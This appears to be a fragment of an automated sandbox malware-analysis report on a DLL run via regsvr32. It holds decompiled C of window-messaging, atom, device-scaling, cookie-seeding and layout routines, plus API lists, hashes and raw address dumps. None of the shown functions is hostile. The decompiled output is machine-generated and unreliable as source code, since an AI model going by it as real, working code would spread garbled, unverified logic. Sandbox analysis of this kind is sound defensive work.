                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t20 = GetWindow(GetDesktopWindow(), 5);
                                                                                                            				while(1) {
                                                                                                            					_t35 = _t20;
                                                                                                            					if(_t35 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
                                                                                                            						SendMessageA(_t35, 0x36d, _a4, 0);
                                                                                                            					}
                                                                                                            					_t20 = GetWindow(_t35, 2);
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            			}









                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32 ref: 1003173F
                                                                                                            • SendMessageA.USER32 ref: 10031753
                                                                                                            • GetDesktopWindow.USER32 ref: 10031757
                                                                                                            • SendMessageA.USER32 ref: 1003177F
                                                                                                            • GetWindow.USER32(00000000), ref: 10031784
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$DesktopLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 2272707703-0
                                                                                                            • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                                                            • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				intOrPtr _v272;
                                                                                                            				intOrPtr _t20;
                                                                                                            				int _t24;
                                                                                                            				unsigned int _t45;
                                                                                                            				intOrPtr _t52;
                                                                                                            
                                                                                                            				_t20 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t20;
                                                                                                            				_v272 = __ecx;
                                                                                                            				_t52 =  *((intOrPtr*)(E100373B5() + 4));
                                                                                                            				if(_t52 != 0 && _a8 != 0) {
                                                                                                            					_t45 = _a8 >> 0x10;
                                                                                                            					if(_t45 != 0) {
                                                                                                            						_t24 =  *(_t52 + 0x8c);
                                                                                                            						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
                                                                                                            							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
                                                                                                            							GlobalAddAtomA( &_v268);
                                                                                                            							GlobalGetAtomNameA(0,  &_v268, 0x103);
                                                                                                            							GlobalAddAtomA( &_v268);
                                                                                                            							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(0, _v8);
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031EDC
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031EEB
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031F03
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031F0C
                                                                                                            • SendMessageA.USER32 ref: 10031F33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1515195355-0
                                                                                                            • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                                                            • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10033E13(intOrPtr* __ecx, int* _a4) {
                                                                                                            				int _v8;
                                                                                                            				int _t12;
                                                                                                            				int _t14;
                                                                                                            				int _t22;
                                                                                                            				int _t32;
                                                                                                            				int* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					_t22 =  *0x1004efa8; // 0x60
                                                                                                            					_t12 =  *0x1004efac; // 0x60
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t32 = GetMapMode( *(__ecx + 8));
                                                                                                            					if(_t32 >= 7 || _t32 == 1) {
                                                                                                            						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                            						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                            						L6:
                                                                                                            						_t36 = _a4;
                                                                                                            						_v8 = _t12;
                                                                                                            						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                                                            						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                                                            						_t36[1] = _t14;
                                                                                                            					} else {
                                                                                                            						_push(3);
                                                                                                            						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            						E10028F83(__ecx, _a4);
                                                                                                            						_push(_t32);
                                                                                                            						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t14;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,742C8B90), ref: 10033E23
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 10033E95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                                                            • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10033EA1(intOrPtr* __ecx, int* _a4) {
                                                                                                            				int _v8;
                                                                                                            				int _t12;
                                                                                                            				int _t14;
                                                                                                            				int _t30;
                                                                                                            				int _t33;
                                                                                                            				int* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					_t30 =  *0x1004efa8; // 0x60
                                                                                                            					_t12 =  *0x1004efac; // 0x60
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t33 = GetMapMode( *(__ecx + 8));
                                                                                                            					if(_t33 >= 7 || _t33 == 1) {
                                                                                                            						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                            						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                            						L6:
                                                                                                            						_t36 = _a4;
                                                                                                            						_v8 = _t12;
                                                                                                            						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                                                            						_t10 =  &(_t36[1]); // 0x4689ec45
                                                                                                            						_t14 = MulDiv( *_t10, _v8, 0x9ec);
                                                                                                            						_t36[1] = _t14;
                                                                                                            					} else {
                                                                                                            						_push(3);
                                                                                                            						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            						E10028F1A(__ecx, _a4);
                                                                                                            						_push(_t33);
                                                                                                            						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t14;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                                                            • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                                                            • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                                                            • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10016B44() {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				signed int _v16;
                                                                                                            				union _LARGE_INTEGER _v20;
                                                                                                            				signed int _t7;
                                                                                                            				signed int _t9;
                                                                                                            				signed int _t10;
                                                                                                            				signed int _t11;
                                                                                                            				signed int _t15;
                                                                                                            				signed int _t22;
                                                                                                            
                                                                                                            				_t7 =  *0x1004c470; // 0xf3933a06
                                                                                                            				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                                                            					GetSystemTimeAsFileTime( &_v12);
                                                                                                            					_t9 = GetCurrentProcessId();
                                                                                                            					_t10 = GetCurrentThreadId();
                                                                                                            					_t11 = GetTickCount();
                                                                                                            					QueryPerformanceCounter( &_v20);
                                                                                                            					_t15 = _v16 ^ _v20.LowPart;
                                                                                                            					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                                                            					 *0x1004c470 = _t22;
                                                                                                            					if(_t22 == 0) {
                                                                                                            						 *0x1004c470 = 0xbb40e64e;
                                                                                                            					}
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            				return _t7;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                                                            • GetTickCount.KERNEL32 ref: 10016B7B
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1445889803-0
                                                                                                            • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                                                            • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr* _v24;
                                                                                                            				signed int _v32;
                                                                                                            				struct tagRECT _v48;
                                                                                                            				signed int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				struct tagRECT _v72;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t170;
                                                                                                            				signed int _t171;
                                                                                                            				intOrPtr* _t172;
                                                                                                            				signed int _t175;
                                                                                                            				signed int _t177;
                                                                                                            				intOrPtr* _t179;
                                                                                                            				signed char _t183;
                                                                                                            				signed int _t184;
                                                                                                            				signed int _t186;
                                                                                                            				intOrPtr* _t200;
                                                                                                            				intOrPtr* _t204;
                                                                                                            				signed int _t220;
                                                                                                            				intOrPtr* _t223;
                                                                                                            				signed char _t233;
                                                                                                            				signed int _t247;
                                                                                                            				signed int _t249;
                                                                                                            				signed int _t258;
                                                                                                            				signed int _t261;
                                                                                                            				signed int _t266;
                                                                                                            				signed int _t268;
                                                                                                            				intOrPtr _t270;
                                                                                                            				signed int _t273;
                                                                                                            				intOrPtr _t275;
                                                                                                            				signed int _t277;
                                                                                                            				intOrPtr* _t282;
                                                                                                            
                                                                                                            				_t268 = 0;
                                                                                                            				_push(0);
                                                                                                            				_t223 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				_push(0x418);
                                                                                                            				_v16 = 0;
                                                                                                            				_v56 = 0;
                                                                                                            				_v52 = 0;
                                                                                                            				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                            				_v32 = _t277;
                                                                                                            				if(_t277 != 0) {
                                                                                                            					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
                                                                                                            					_v16 = _t175;
                                                                                                            					if(_t277 > 0) {
                                                                                                            						_v12 = _t175;
                                                                                                            						do {
                                                                                                            							E1002B71F(_t223, _t268, _v12);
                                                                                                            							_v12 = _v12 + 0x14;
                                                                                                            							_t268 = _t268 + 1;
                                                                                                            						} while (_t268 < _t277);
                                                                                                            						_t270 = _v16;
                                                                                                            						_t177 = 0;
                                                                                                            						if(_t277 > 0) {
                                                                                                            							_t233 =  *(_t223 + 0x7c);
                                                                                                            							if((_t233 & 0x00000002) == 0) {
                                                                                                            								_t266 = _t233 & 0x00000004;
                                                                                                            								_v48.bottom = _t266;
                                                                                                            								if(_t266 == 0) {
                                                                                                            									L19:
                                                                                                            									_push(_t177);
                                                                                                            									asm("sbb eax, eax");
                                                                                                            									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                                                            									__eflags = _t177;
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									if((_a8 & 0x00000004) != 0) {
                                                                                                            										L18:
                                                                                                            										_push(_t177);
                                                                                                            										_push( *((intOrPtr*)(_t223 + 0x6c)));
                                                                                                            									} else {
                                                                                                            										if((_a8 & 0x00000008) == 0) {
                                                                                                            											__eflags = _a8 & 0x00000010;
                                                                                                            											if((_a8 & 0x00000010) == 0) {
                                                                                                            												__eflags = _a12 - 0xffffffff;
                                                                                                            												if(_a12 == 0xffffffff) {
                                                                                                            													__eflags = _t233 & 0x00000001;
                                                                                                            													if((_t233 & 0x00000001) == 0) {
                                                                                                            														goto L19;
                                                                                                            													} else {
                                                                                                            														goto L18;
                                                                                                            													}
                                                                                                            												} else {
                                                                                                            													SetRectEmpty( &_v48);
                                                                                                            													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
                                                                                                            													_t220 = _a8 & 0x00000020;
                                                                                                            													__eflags = _t220;
                                                                                                            													if(_t220 == 0) {
                                                                                                            														_t258 = _v48.right - _v48.left;
                                                                                                            														__eflags = _t258;
                                                                                                            													} else {
                                                                                                            														_t258 = _v48.bottom - _v48.top;
                                                                                                            													}
                                                                                                            													_push(_t220);
                                                                                                            													_push(_t258 + _a12);
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_push(0);
                                                                                                            												L20:
                                                                                                            												_push(_t177);
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_push(0);
                                                                                                            											_push(0x7fff);
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_push(_t277);
                                                                                                            								_push(_t270);
                                                                                                            								E1002BCF4(_t223, _t266);
                                                                                                            							}
                                                                                                            							_push(_t277);
                                                                                                            							_push(_t270);
                                                                                                            							_push( &(_v48.right));
                                                                                                            							_t179 = E1002BBD2(_t223);
                                                                                                            							_v56 =  *_t179;
                                                                                                            							_v52 =  *((intOrPtr*)(_t179 + 4));
                                                                                                            							if((_a8 & 0x00000040) != 0) {
                                                                                                            								_t261 = 0;
                                                                                                            								_v8 = 0;
                                                                                                            								_a12 = 0;
                                                                                                            								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
                                                                                                            								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
                                                                                                            								if(_t277 > 0) {
                                                                                                            									_t200 = _t270 + 4;
                                                                                                            									_v24 = _t200;
                                                                                                            									_t247 = _t277;
                                                                                                            									do {
                                                                                                            										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
                                                                                                            											_t261 = _t261 + 1;
                                                                                                            										}
                                                                                                            										_t200 = _t200 + 0x14;
                                                                                                            										_t247 = _t247 - 1;
                                                                                                            									} while (_t247 != 0);
                                                                                                            									_a12 = _t261;
                                                                                                            									if(_t261 > 0) {
                                                                                                            										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
                                                                                                            										if(_t273 == 0) {
                                                                                                            											_t64 =  &_v8;
                                                                                                            											 *_t64 = _v8 & 0x00000000;
                                                                                                            											__eflags =  *_t64;
                                                                                                            										} else {
                                                                                                            											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
                                                                                                            											_v8 = _t273;
                                                                                                            										}
                                                                                                            										_a12 = _a12 & 0x00000000;
                                                                                                            										_v12 = _v12 & 0x00000000;
                                                                                                            										_t204 = _v24;
                                                                                                            										_t275 = _v8 + 8;
                                                                                                            										_v20 = _t275;
                                                                                                            										_v24 = _t204;
                                                                                                            										do {
                                                                                                            											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
                                                                                                            												_t249 = _v12;
                                                                                                            												 *((intOrPtr*)(_t275 - 8)) = _t249;
                                                                                                            												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
                                                                                                            												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
                                                                                                            												E10028E96(_t223,  &_v72);
                                                                                                            												_a12 = _a12 + 1;
                                                                                                            												_v20 = _v20 + 0x18;
                                                                                                            												_t204 = _v24;
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t277 = _v32;
                                                                                                            												_t275 = _v20;
                                                                                                            											}
                                                                                                            											_v12 = _v12 + 1;
                                                                                                            											_t204 = _t204 + 0x14;
                                                                                                            											_v24 = _t204;
                                                                                                            										} while (_v12 < _t277);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t183 =  *(_t223 + 0x7c);
                                                                                                            								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
                                                                                                            									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
                                                                                                            								}
                                                                                                            								_t271 = 0;
                                                                                                            								_t307 = _t277;
                                                                                                            								if(_t277 > 0) {
                                                                                                            									_v20 = _v16;
                                                                                                            									do {
                                                                                                            										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
                                                                                                            										_v20 = _v20 + 0x14;
                                                                                                            										_t271 = _t271 + 1;
                                                                                                            									} while (_t271 < _t277);
                                                                                                            								}
                                                                                                            								_t184 = _a12;
                                                                                                            								if(_t184 > 0) {
                                                                                                            									_t282 = _v8 + 8;
                                                                                                            									_a12 = _t184;
                                                                                                            									do {
                                                                                                            										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
                                                                                                            										_v32 = _t186;
                                                                                                            										if(_t186 != 0) {
                                                                                                            											GetWindowRect( *(_t186 + 0x1c),  &_v72);
                                                                                                            											_t271 = _v72.left -  *_t282;
                                                                                                            											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
                                                                                                            											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
                                                                                                            											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
                                                                                                            										}
                                                                                                            										_t282 = _t282 + 0x18;
                                                                                                            										_t125 =  &_a12;
                                                                                                            										 *_t125 = _a12 - 1;
                                                                                                            										_t313 =  *_t125;
                                                                                                            									} while ( *_t125 != 0);
                                                                                                            									_push(_v8);
                                                                                                            									L1001F7A9(_t223, _t271, _t282, _t313);
                                                                                                            								}
                                                                                                            								_t270 = _v16;
                                                                                                            								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
                                                                                                            							}
                                                                                                            							_push(_t270);
                                                                                                            							L1001F7A9(_t223, _t270, _t277, _t313);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				SetRectEmpty( &_v72);
                                                                                                            				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
                                                                                                            				_v52 = _v52 + _v72.top - _v72.bottom;
                                                                                                            				_v56 = _v56 + _v72.left - _v72.right;
                                                                                                            				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                                                            				_t170 = _v48.right;
                                                                                                            				if(_v56 <= _t170) {
                                                                                                            					_v56 = _t170;
                                                                                                            				}
                                                                                                            				_t171 = _v48.bottom;
                                                                                                            				if(_v52 <= _t171) {
                                                                                                            					_v52 = _t171;
                                                                                                            				}
                                                                                                            				_t172 = _a4;
                                                                                                            				 *_t172 = _v56;
                                                                                                            				 *(_t172 + 4) = _v52;
                                                                                                            				return _t172;
                                                                                                            			}










































                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002c250
                                                                                                            0x1002c254
                                                                                                            0x1002c269
                                                                                                            0x1002c272
                                                                                                            0x1002c272
                                                                                                            0x1002c275
                                                                                                            0x1002c282
                                                                                                            0x1002c282
                                                                                                            0x1002c277
                                                                                                            0x1002c27a
                                                                                                            0x1002c27a
                                                                                                            0x1002c285
                                                                                                            0x1002c28b
                                                                                                            0x1002c28b
                                                                                                            0x1002c247
                                                                                                            0x1002c247
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c239
                                                                                                            0x1002c239
                                                                                                            0x1002c23a
                                                                                                            0x1002c23a
                                                                                                            0x1002c237
                                                                                                            0x1002c231
                                                                                                            0x1002c2a9
                                                                                                            0x1002c2ac
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2b2
                                                                                                            0x1002c2b3
                                                                                                            0x1002c2b7
                                                                                                            0x1002c2ba
                                                                                                            0x1002c2c8
                                                                                                            0x1002c2cb
                                                                                                            0x1002c2ce
                                                                                                            0x1002c2da
                                                                                                            0x1002c2de
                                                                                                            0x1002c2e1
                                                                                                            0x1002c2e4
                                                                                                            0x1002c2e7
                                                                                                            0x1002c2ed
                                                                                                            0x1002c2f3
                                                                                                            0x1002c2f6
                                                                                                            0x1002c2f9
                                                                                                            0x1002c2fb
                                                                                                            0x1002c2ff
                                                                                                            0x1002c306
                                                                                                            0x1002c306
                                                                                                            0x1002c307
                                                                                                            0x1002c30a
                                                                                                            0x1002c30a
                                                                                                            0x1002c30f
                                                                                                            0x1002c312
                                                                                                            0x1002c324
                                                                                                            0x1002c329
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c32b
                                                                                                            0x1002c336
                                                                                                            0x1002c33b
                                                                                                            0x1002c33b
                                                                                                            0x1002c347
                                                                                                            0x1002c34b
                                                                                                            0x1002c34f
                                                                                                            0x1002c352
                                                                                                            0x1002c355
                                                                                                            0x1002c358
                                                                                                            0x1002c35b
                                                                                                            0x1002c35f
                                                                                                            0x1002c366
                                                                                                            0x1002c369
                                                                                                            0x1002c372
                                                                                                            0x1002c37a
                                                                                                            0x1002c386
                                                                                                            0x1002c38b
                                                                                                            0x1002c38e
                                                                                                            0x1002c392
                                                                                                            0x1002c398
                                                                                                            0x1002c399
                                                                                                            0x1002c39a
                                                                                                            0x1002c39b
                                                                                                            0x1002c39c
                                                                                                            0x1002c39f
                                                                                                            0x1002c39f
                                                                                                            0x1002c3a2
                                                                                                            0x1002c3a5
                                                                                                            0x1002c3ab
                                                                                                            0x1002c3ab
                                                                                                            0x1002c35b
                                                                                                            0x1002c312
                                                                                                            0x1002c3b0
                                                                                                            0x1002c3b5
                                                                                                            0x1002c3be
                                                                                                            0x1002c3be
